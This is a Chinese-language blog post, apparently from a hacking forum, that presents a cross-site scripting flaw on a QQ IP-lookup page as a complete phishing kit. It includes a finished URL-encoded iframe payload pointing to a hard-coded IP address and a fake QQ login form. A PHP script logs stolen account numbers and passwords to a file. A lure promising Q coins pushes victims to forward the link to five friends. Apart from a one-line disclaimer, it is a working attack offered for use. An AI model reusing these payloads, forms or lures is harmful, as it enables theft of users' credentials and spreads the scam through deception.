QQ 网站的最新跨站安全漏洞及钓鱼方法.


以下是做好后的 QQ 密码钓鱼地址:

http://ip.qq.com/cgi-bin/searchip?searchip1=%3C%69%66%72%61%6D%65%20src%3d%68%74%74%70%3A%2F%2F%31%37%33%2E%32%31%32%2E%32%35%34%2E%31%39%38>%3C%2F%69%66%72%61%6D%65%3E

大家可以访问下试试.

跨站产生在: http://ip.qq.com/cgi-bin/searchip?searchip1=

这个地址,我们先来测试下.

http://ip.qq.com/cgi-bin/searchip?searchip1=<script>alert("www.pker.in")</script>

好的,弹窗成功.我们来看看具体利用方法.

这里需要注意的地方:会把=号作为结束,所以我们要把=号替换成%3d

之后我们就可以发挥自己的想想来利用了,我给大家提供一种钓鱼的利用方法.

注明:此方法仅供安全测试,严禁用于其他用途!

http://ip.qq.com/cgi-bin/searchip?searchip1=<iframe src%3d<a href="http://" target="_blank" rel="external">http://</a>你的钓鱼页面/></iframe>

但是这样的话,会轻易被人发现,所以我们要把searchip1=后面的代码转义下.这个大家自己操作.

附上登陆页和提交地址代码.

<form action="qq.php" method="post">

  <p>  QQ帐号:

    <input name="haoma" type="text" id="haoma" maxlength="10" />

</p>

  <p> QQ密码:

    

    <input name="mima" type="password" id="mima" maxlength="26" />

    </p>

  <p>

       

      <input type="submit" value="登 陆" />  

      <input type=button value=取 消 onclick="location.reload()">

</p>

</form>

把这个保存为index.html  传到你空间首页,之后再加一个接收页面.

里面的具体参数大家自己修改.有不明白的地方可以到我们论坛的在线提问版块交流

<?php

$hao = $_POST["haoma"] . "----" . $_POST["mima"] . "
";

$dz = fopen('pker.in','a');

if($dz){

fwrite($dz,$hao);

}

fclose($dz);

echo "感谢您参与腾讯IP分享计划,请将此链接转发给5个QQ好友,您将会获得我们提供的Q币5枚.3日内到账." . "</br>";

?>

<script type="text/javascript">

    function jsCopy(){

        var e=document.getElementById("content");

        e.select();  

        document.execCommand("Copy");  

    }

</script>

<p>

  <textarea cols="20" name="content" rows="2" id="content">腾讯IP分享计划,分享IP得Q币!快来参加!http://ip.qq.com/cgi-bin/searchip?searchip1=%3C%69%66%72%61%6D%65%20src%3d%68%74%74%70%3A%2F%2F%31%37%33%2E%32%31%32%2E%32%35%34%2E%31%39%38>%3C%2F%69%66%72%61%6D%65%3E</textarea>

  </br>

</p>

<p>

  <input type=button value="点我复制链接并发送给好友" onclick="jsCopy()">

</p>

把这个页面保存在和刚才的index.html同目录下,文件名为qq.php
之后你只要诱导别人去访问那个页面就OK了,他登陆后`你只要去访问你钓鱼地址目录下的pker.in文件就可以看到帐号密码了.

转载请注明来源:http://www.pker.in

图片描述

抢沙发

昵称*

邮箱*

网址